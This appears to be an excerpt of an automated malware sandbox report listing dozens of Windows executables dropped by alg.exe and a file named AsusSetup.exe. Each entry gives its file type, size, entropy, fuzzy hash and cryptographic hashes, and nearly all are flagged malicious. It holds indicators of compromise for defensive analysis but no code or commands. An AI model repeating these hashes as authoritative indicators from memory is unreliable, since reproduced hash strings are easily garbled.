                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:PhDdVrQ95RW0YEHyWQXE/09Val0GSLNiXicJFFRGNzj3:PhHYW+HyWKZ7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:02A39F6A65834451980F9B1EE3EA62AA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:AE7FC7B33DDC9B618E6D509661DD7B36ACDA3E71
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7103233B89F635A1FCB2ABEF62D1C2E8DBAED30C8B914ABB8599EC5E54B84483
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:2DDB68E45E3EE7CE144270FA484D554054E4536146B3C6C5F48A13D53B2D9B6848DCD5934B7CC9F2A7D814BDAD0FE1E61AF08CC0BC7101700666BED4859D783E
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1825280
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.153830006148867
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:N70E0ZCQZMiU6Rrt9RoctGfmdd4/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:J0EzQSyRPRoc1ELNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D536476D12E3FAFD28EE05FBBF417C47
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:3337D8556614A0CABA0110AD2FEBF1A3C9B3BDBE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:80C082615610F1A7F759744AAB80F7177FB8D9FCC4ED5FEB708374708D2009FD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:FA9445258261AAFCF78025700B7D423F1A25471C6E4B3D9027ED1ABCBB0E4700167E6C5352B69A6393EDEE9CB261DF11CEF97CEFD297F52B06226DE6D089409F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.140923902756681
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:JiD2VmA1YXwHwlklb8boUuWPg2g3/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ID2VmAyiwIb8boQoLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:19872E252350649D1101974D738FEE98
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:984FE167BC1017416F79E8207A1E664FAC12DF5E
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:96EBDCC342A14DB2F8ABF7BFCAF05F71F7A6B9A968BB6E84D97207FB5AD3F324
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:7A53F6B94786B3547E955D737A7BA2E8B28557F9685DC29D6575DE7689D794A27C2C98BC80D2D7672E7328F2D2FF30A9B0F4F99CC9A2984CA1943719AC5F8C24
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2853376
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.9482223138387775
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:vfD3zO9ZhBGloizM3HRNr00ALNiXicJFFRGNzj3:XDaalxzM00A7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:DF9DFC853B1735799AFB8618C20DCD3F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5C79248F4B2DA8EC4C24764E3840DA725E87FA5F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:F5C3F90E83A8EC0D820A044DEECA634DAD8DB398EC6845E30E37FBDA7D6B3F91
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:3C1ED0192A32CFFA9A509F16FB169E42A0A8A6C2CAE68FC1A62D39C5301EF274FE0414DD607820A70DC7D5156A258B98F279D9C39DE115539867946BEEA51998
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):4320256
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.822725471716943
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2062336
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.09311408126846
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.161661135930208
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1847808
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.140921589195591
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.1616587056386765
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1481216
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.699186260708726
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:1glbht6BHF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:OlNtqHFLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:ECD2247199F78B86DE38E872A9DEA725
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:4CE8078E3D0090B733861142C5AB378DBB459885
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:5DE62F6D6F7858E9C9EC473D0C7BF3C2F4A3D3F1763A76B17E67AB958B37AF2D
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:79458B12A888A29E0A5FED629D7B1D25EB18D078C8F8F79D67441B50B00FB1F3D54D22907DC10D9F35CFA3109029D7D33D1602F387869F4A4923991C24EF3A3B
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1376768
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.662279424367206
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:AIxkTBVR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:pxk1VRLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D6920841EB769314CD9C9E25F9AFECEA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9574C6E669C281313AE451708357A3BA5D22B79B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:426F665CD7AEBFB797ECCF0FA44AC34DBF8C2F99EA71646973BEA514B35AA45B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:61BF353A941AC94BC2F2EE7CF47D82DBEA57320B22445A5B24FC9E148AE5FDF7A198AF39E878FC8FAD9320596A6A2C82D9FDAFBE21A12BE2E6CBAD34C14DA856
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1490944
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.791243799023212
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:lcssmrM/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:ibfLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:0C73631BBD43DDD0DBCFF685EDAE4C59
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0C4B8AC0480229625ADCE55B3C2F01D2DA50F4B3
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:7587DE77FF4F37800571B87378D5989174900C17791A82ABC1139B02171DD253
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:C11B36D28DD6219B9B39984059062FD9D26AF3D29BA2F31622A9499E91ADFC8EC76C538C4FFB4A5646347B54513776D6A129AE264B76127529F5F2D7E7479A49
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1539584
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.901305567772658
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:a0/cT++foSBWU2Yxhkgr/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:R/cK+foQWU2YnPrLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:0E0B43A34957B0444A87F16259F85BE0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:9E9456E512C849DB3C6E8FEEDDF519D459B29562
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1B0B425141A0F2664ECCB9247F12295A006486AF18DB1A17D218DD13CD8A4071
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:930536308E8AB0F3FA47AE9013FD411BD0AA0DC9BA1A5AB96E5F286DD34A039818D63DC289E2BA54F4A301F18BB0E099970D80C0008B164A9AE9B9CA6052D4AB
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1376768
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.662332271796822
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:sbBRzBgL/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:WBRVgLLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:A46F6523010FEECE612A8EF08B76C6E8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:89A6E836F85B5C61C56DCD0CDAA8C37A8EE16D18
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:1EFF6ECAD030FD562CCDFC3BDD910AC75CD67F9CC794F919F90206EA4E8D216F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:871909D8B0CCBF9FED109B01F25BB20C8137874E99FA45F24A0C5BE18B704D48083A74C310B1E9171437FEBF637586A843575F6CC360FCAF5F3993327262E21F
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):2168832
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.938835751991505
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:49152:/y53w24gQu3TPZ2psFkiSqwozJLNiXicJFFRGNzj3:/yFQgZqsFki+ozJ7wRGpj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:5FA5A0556AC12C5E3C0787FC12B96ABB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:79E48CC0ED6A0E35BF8E4139196058569100FC09
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:01656D886E4CCA72F8EF04269B67214E4D193A3C7EBA94D0EC34B0824ED788FD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:B93D32D4FF9843BA04CC154B63AC0ED10A1C9C154AB8B587BCD5FD8B8C29E18D7B960375CD8B30AF6F865054E858F05577524CBDAD0C3AD7E1CDFF466C5FF5E9
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):3141
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.8287906164717675
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24:m/Ldx/HY/r/s/CJ/P/kRQaWtG/waWmIG/jW/u/J/8D/H/paWqG/VM/qCaWlbGaWM:WqCRyBmp6tr4Cxq4htniD
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:A1ABF723445B1E61689957F9F1823BB6
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0F0B77DC49E78059C2BF6CBD2BE4C975B62BF365
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:143A82372D645C4119FE0037F233F2BC7EF3E647B81E5652B8A41068ABE954FD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:74EFCD329E884226B81C8D011245479C1D11284F8242219E4710EA00028F467B014D71AF1256F28E0264E3FD07714D2A50EF7EECCFCE2DF4B38EA408331AD11C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Preview:2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeAssignPrimaryTokenPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeAuditPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeBackupPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeCreateGlobalPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeCreatePagefilePrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeCreatePermanentPrivilege...2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeCreateSymbolicLinkPrivilege...2024-10-28 11:50:01-0400: Could not disable token privilege value: SeCreateTokenPrivilege. (1300)..2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeDebugPrivilege...2024-10-28 11:50:01-0400: Could not disable token privilege value: SeEnableDelegationPrivilege. (1300)..2024-10-28 11:50:01-0400: Disabled unneeded token privilege: SeImpersonatePrivilege...2024-10-28 11:50:0
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\AsusSetup.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1512448
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.901612842389403
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:PQVTZu0JY/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4VTZupLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:8692348A40AAA0C027003BE9DA09E432
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:DCA629572218B83ACA61B85850113AE8CEA44785
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:219678895BCFE1D12193A997DFE4161F9FE65CE0FF21AE6846432CA1C415A4AE
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:DF755A9F6E1C040099509082E75E29F56148A291FCD67E98CAFC9FC9380EC64E55CBE6D4764D721BB5B8DD5D165D25D818BAEB183405553B8909B357C6C3FA2C
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1839616
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2488737267134535
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:V+gkEHfh4CoD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:8gkE/SlLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:353E4B964B509A17DE4188165AAB10CD
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:5E2B170B9ADA06DEACF70555B0539CAC3451D239
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:A599465C28BCB6D2BE2455A0D30666A148DA8166A7126A1FA19834267FA41D70
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:3A482ABFEDF7BB48D4602A6F5BEF00527A0D825DBA4451BA2212C2DC1494A40F527EA1B0AF8AB344D6CA00FF40B2C9CBDCF6E1E162F7651B550C6281EBF779A2
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1532416
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.091709292241218
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:sBpDRmi78gkPXlyo0GtjrQ/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:4NRmi78gkPX4o0GtjsLNiXicJFFRGNzb
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:3F7927D8C34047A6461E4351DBB2955C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:852CA171AD8CA23AE5BB8EF0535608EAF44DE1B0
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:C1065F9F88312B60FBCBCB3FB6872EE1BCEBFAE4390347B0B129A4163DD6625F
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:1FB6F9BFB761015BD36CE3FD15E9AD16531ED76BCAD0F639F9E08C55A8DE98C5A35DFAA2ED0C70BC585D609877A921615C3D2120EFB394E622E506B3B3F47095
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1282048
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.222630997089964
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:BLOS2oTPIXVD/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:b/TELNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2854140D4D8DA418C17B3297E25BA5D9
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:68A766A036D9D684CA1D1133C9A8843CD8D0ADDA
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:9A4483667F68AA97C23A2EA4CDBA48D4588DA1CFA6B4EE9417AD42FA64D0939B
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:5E95675FEB7060D3515338552204D45A31CE0E4CA606D16081AC0DE90E5651F4D180FC3A8A1AFCC5DF2773C181B47309670C59370CF2FBB65DA8B21D42E07AD4
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1300992
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.534778720187119
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:AtF/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:yLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:2B97BD1393ED933265C488E51D19E9DB
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:BC968AA469A80570819A7B98304E44A86B8D3E1A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:D36C7E15879CA2F3936BE3A59B6D2D3D42D94D2B3AD084E568F1875E4813BA90
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:652CCC9DB155517F337818D3DFB121D26D35FC207764C2594D6DF18AB0E7FBE706686DB9A1796F1CB0FD9E822165C49AF7A524216762A8DECA0AB4D76D216F54
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1222656
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.702475065375768
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:24576:sAdz6/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:sAdGLNiXicJFFRGNzj3
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:D11D16455E2A9513EEE21191F40371D8
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:35F458894101A6C5278CEFF151A15960704D940C
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:2D55DDE665D0E6FA68BE7919E61AAF47987BAFEB90286A9B51981834B7041AED
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:68252FAAD3D15AEFA38277FF65A7C1CB0638DD6C4DF26684E0972CABB2F4234F1D4B2C7DAFC1C8A63CDD11C8E15E378DB37577F74CE71222222A86B3485C12D0
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1613312
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.680237146826291
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
Malicious:true
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1616896
Entropy (8bit):5.046918514042736
Encrypted:false
Malicious:true
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):4151808
Entropy (8bit):6.497769516282855
Encrypted:false
Malicious:true
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):59941376
Entropy (8bit):7.999360391534468
Encrypted:true
Malicious:true
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1335808
Entropy (8bit):4.597044716839718
Encrypted:false
Malicious:true
Process:C:\Windows\System32\alg.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):6210048
Entropy (8bit):6.385265848124412
Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                  Size (bytes):1312768
                                                                                                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.548413853839869
                                                                                                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:SjiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:SX/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                                                                                                                                                                                                                                                                                  MD5:C4BDD1D3542A21CA8EB990CCEE7F09E7
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA1:0F90994DB886897A618475482F522F2CD69B8C64
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-256:61B4FF1698513A77B4A424161C867DCDA20BCD67F22A6DE3E2739B01AEEA411A
                                                                                                                                                                                                                                                                                                                                                                                                                  SHA-512:4A9DF71A32280AB8C50465CAB60C96E4C8C3E3DC09516758E565EF22C9FC6E294BF0B407084064E4FE882ADEC1E369EAEE52CD7E8683CF703FE0B836D6B34FCB
                                                                                                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\alg.exe
